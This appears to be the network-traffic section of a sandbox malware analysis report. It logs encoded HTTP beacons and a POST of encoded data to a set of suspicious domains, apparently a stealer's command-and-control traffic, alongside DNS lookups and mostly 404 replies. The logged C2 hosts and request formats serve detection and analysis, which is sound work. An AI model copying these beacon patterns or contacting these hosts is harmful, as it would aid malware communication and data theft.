    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Source: global traffic, HTTP traffic detected:
    GET /pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6ME+5G/BY7+mMEXOiclzjhJwCZdUbRes612uS6KmZhj3zV5mWNPQZslZbRtI4SShrzI4pEvHSsV/RdVS1ssPCnJ48fYcpfjGOVa6yb/Zo31Sw==&t8=erepa0aHg HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.amayavp.xyz
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Source: global traffic, HTTP traffic detected:
    GET /nlsy/?t8=erepa0aHg&dpy4vDKP=UqZJjljcaDHPU5MJF3/VZj5j3teXWnZaRQ/xhIwYknb6hebLg3nkkQRCQY+bdc+EMOTwSi3/zIBCbkzFO/JkBIXeM3N7PUFbamj23ddqQuGG3w5lM7wcBAQnAQO0NkBIlw== HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.beythome.online
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Source: global traffic, HTTP traffic detected:
    GET /e60d/?dpy4vDKP=Lh8IZlyEUGMyHNz6uzMKRKcg9kIQklaGIJ5xEwxQigTlOIYbC6hIWaFGebeUYVIRA2Z0HVQvNj5Y3e9+xtlK2GGMMiSOyWHkKpdyqmIJ1jPdVOmhO/2pbDJYfwa6foHFGQ==&t8=erepa0aHg HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.9
    Host: www.d48dk.top
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Source: global traffic, DNS traffic detected: DNS query: www.bagatowcannabis.cloud
Source: global traffic, DNS traffic detected: DNS query: www.8600228.xyz
Source: global traffic, DNS traffic detected: DNS query: www.remedies.pro
Source: global traffic, DNS traffic detected: DNS query: www.officinadelpasso.shop
Source: global traffic, DNS traffic detected: DNS query: www.liveplah.live
Source: global traffic, DNS traffic detected: DNS query: www.appsolucao.shop
Source: global traffic, DNS traffic detected: DNS query: www.cg19g5.pro
Source: global traffic, DNS traffic detected: DNS query: www.kuyubak.online
Source: global traffic, DNS traffic detected: DNS query: www.acond-22-mvr.click
Source: global traffic, DNS traffic detected: DNS query: www.vpnto.net
Source: global traffic, DNS traffic detected: DNS query: www.avalanchefi.xyz
Source: global traffic, DNS traffic detected: DNS query: www.amayavp.xyz
Source: global traffic, DNS traffic detected: DNS query: www.beythome.online
Source: global traffic, DNS traffic detected: DNS query: www.d48dk.top
Source: global traffic, DNS traffic detected: DNS query: www.fantastica.digital
                Source: unknownHTTP traffic detected: POST /1aqh/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.8600228.xyzOrigin: http://www.8600228.xyzConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 209Cache-Control: max-age=0Referer: http://www.8600228.xyz/1aqh/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)Data Raw: 64 70 79 34 76 44 4b 50 3d 42 49 58 6c 46 55 49 56 66 38 35 69 58 2f 2f 50 30 58 67 54 61 34 34 6c 70 76 41 35 52 77 73 51 7a 6a 51 53 6b 4f 37 55 69 35 6e 31 36 48 4b 74 50 72 58 72 36 63 45 6d 44 66 75 59 35 42 45 76 2f 43 2f 6f 37 37 42 37 50 4e 74 45 64 72 35 47 44 78 61 65 72 55 57 4d 4d 66 6e 2f 7a 78 56 6a 69 70 45 63 70 4c 47 58 4d 42 67 31 73 78 6e 6c 45 4a 30 35 59 53 72 6c 71 4a 67 62 2f 6f 4c 49 44 72 50 51 68 6d 54 54 31 48 64 66 65 34 6e 54 42 4a 6b 61 50 56 59 34 44 64 33 38 63 66 71 7a 51 69 51 41 4e 42 69 38 46 6d 63 6d 76 37 68 54 34 38 65 6f 38 37 4c 44 4a 51 38 4c 70 46 30 58 79 42 74 37 53 6e 4d 3d Data Ascii: dpy4vDKP=BIXlFUIVf85iX//P0XgTa44lpvA5RwsQzjQSkO7Ui5n16HKtPrXr6cEmDfuY5BEv/C/o77B7PNtEdr5GDxaerUWMMfn/zxVjipEcpLGXMBg1sxnlEJ05YSrlqJgb/oLIDrPQhmTT1Hdfe4nTBJkaPVY4Dd38cfqzQiQANBi8Fmcmv7hT48eo87LDJQ8LpF0XyBt7SnM=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:43:27 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:43:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 31 34 38 0d 0a 3c 62 72 3e 0d 0a 3c 62 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 22 3e e5 8a a0 e8 bd bd e4 b8 ad ef bc 8c e8 af b7 e7 a8 8d e5 90 8e 2e 2e 2e 2e 2e 2e 3c 2f 70 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4a 58 4f 79 43 6d 38 6f 64 56 58 78 68 42 32 77 22 2c 63 6b 3a 22 4a 58 4f 79 43 6d 38 6f 64 56 58 78 68 42 32 77 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 31 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 66 79 65 72 2e 63 6f 6d 3f 69 64 3d 38 34 35 36 32 22 20 2f 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 148<br><br><center><p style="font-size: 20px;">......</p></center><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"JXOyCm8odVXxhB2w",ck:"JXOyCm8odVXxhB2w"})</script><meta http-equiv="refresh" content="1;url=https://www.bfyer.com?id=84562" />0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 08:44:15 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6f 39 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /io9k/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 08:44:18 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6f 39 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /io9k/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 08:44:20 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6f 39 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /io9k/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 08:44:23 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6f 39 6b 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /io9k/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 08:44:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 08:44:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 08:44:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 08:44:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 05 Dec 2024 08:45:23 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-05T08:45:28.7410353Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 05 Dec 2024 08:46:39 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-05T08:46:44.2627996Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:46:46 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:46:49 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:46:51 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
